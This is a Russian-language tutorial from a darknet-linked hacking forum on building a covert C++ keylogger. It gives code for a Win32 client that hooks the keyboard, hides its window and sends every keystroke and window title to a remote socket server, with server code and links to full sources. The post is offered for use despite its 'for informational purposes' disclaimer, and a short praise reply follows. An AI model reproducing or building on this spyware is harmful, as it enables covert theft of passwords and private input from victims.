Пишем переносной кейлоггер на C++

  • Автор темы HHIDE_DUMP
  • Дата начала
  • Просмотры 885
  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time
Статус
В этой теме нельзя размещать новые ответы.

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость

Вся информация предоставлена исключительно в ознакомительных целях. Ни администрация, ни автор не несут ответственности за любой возможный вред, причиненный материалами данной статьи.
Предисловие
На протяжении, примерно, месяца я постоянно наблюдал за различными просьбами, вопросами насчет кейлоггеров. Многие искали, но не могли найти исходники, многие искали, но не могли найти продажники и т.д.

В этой статье я хочу показать, насколько просто написать самому кейлоггер с базовым функционалом. Базу я позаимствовал отсюда -
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
, пофиксил баги и доработал под взаимодействие с WinSocket.


Материалы
  • Visual Studio 2015 Community Update 4
  • Visual C++ 2015
Структура приложения
Для начала необходимо определить, как вообще будет работать кейлоггер. Будь то отсылка логов на FTP/Почту, запись нажатий в сокет, отправка файла на гейт, запись логов в бд.
Я решил остановится на сокетах. Почему? Это удобно, просто и юзабельно.
Исходя из выбора, нам нужно будет сделать 2 приложения:

Сервер
  • Консольное приложение, которое будет принимать данные от клиента и выдавать в консоли
Клиент
  • Собственно, сам кейлоггер, который будет отсылать нажатия клавиш на сервер
И начнем мы, пожалуй, с сервера.

Сервер
Создаем консольное C++ приложение в Visual Studio.
Весь код есть в оф. примере MSDN -
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

Нам лишь нужно заменить некоторые значения в нем...
Сразу пропишем константные переменные: величину буффера и порт сервера, на который будут приходить логи

Код:
#define DEFAULT_BUFLEN 1024 //Буффер
#define DEFAULT_PORT "1337" //Порт
Вместо единоразового do/while ставим бесконечный цикл, в котором будем принимать данные от клиента, выводить их в консоль, закрывать соединение и по новой:
Код:
do {
  ClientSocket = accept(ListenSocket, NULL, NULL); //Принимаем коннект
  iResult = recv(ClientSocket, recvbuf, recvbuflen, 0);//Считываем лог
  if (iResult > 0) //Если лог не пустой
    printf("%s", recvbuf); //Выводим
  closesocket(ClientSocket);//Закрываем соединение
  memset(recvbuf, 0, sizeof recvbuf);//Освобождаем память
}
while (true);
Компилируем в Release, закидываем на дедик, открываем нужный нам порт и запускаем

Клиент

Создаем приложение Win32 в Visual Studio.
Как я уже и говорил выше, хук клавиатуры и обработчик нажатий я взял с
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

Чтоб прикрутить отправку нажатия на сокет я обратился к
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

Так же, сразу определяем константные переменные: длину буффера, айпи дедика/компа и порт

Код:
#define DEFAULT_BUFLEN 20000
#define SERVER_IP "127.0.0.1"
#define SERVER_PORT "1337"
Некоторые переменные пришлось вытащить из их методов и сделать глобальными, чтобы код начал работать корректно:
Код:
WSADATA wsaData;
SOCKET ConnectSocket = INVALID_SOCKET;
HHOOK _hook;KBDLLHOOKSTRUCT kbdStruct;
char lastwindow[256];
int Save(int key_stroke);// Убрал второй аргумент
Создаем метод отправки данных на сервер по примеру, который был в начале абзаца. Далее, везде заменяем порт, айпи и передаваемую инфу на аргументы функции:
Код:
void sendData(char *ip, char * port, char*data)
В методе Save делаем следующее - убираем второй аргумент и меняем запись логов в файл на отправку к серверу:
Код:
char data[DEFAULT_BUFLEN];
sprintf(data, "\n\n[Window: %s - at %s]\n", window_title, s);   sendData(SERVER_IP, SERVER_PORT, data);
Далее, по такому же принципу, меняем отправку в нажатиях служебных клавиш. Отправку букв можно сделать таким образом:
Код:
char c[512];
sprintf(c, "%c", key_stroke);
sendData(SERVER_IP, SERVER_PORT, c);
Вырезаем все что связано с видимостью окна из кода, и, готово.

Итог

При запуске кейлоггера, он повиснет в процессах и будет обрабатывать каждое нажатие на клавиатуре. Возможно, некоторые символы будут отображаться некорректно, например, слеши, но все это можно исправить самому (ведь если бы все было идеально, ко мне в личку стучал Иисус с просьбой проверить продажник приватного кейлоггера).

Лог будет выглядеть так:



Ссылки

Сигнатурные сканы (не спрашивайте зачем просканил сервер, просто так):
Кейлоггер, взятый за основу -
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

Сокет-сервер -
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

Сокет-клиент -
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

Готовые исходники проекта -
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
 
Последнее редактирование:

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
Чувак, я данвно почитываю тебя. Ну как давно, с момента регистрации. Ну ты кул короче) Красавчик)
 
Статус
В этой теме нельзя размещать новые ответы.

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2024

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя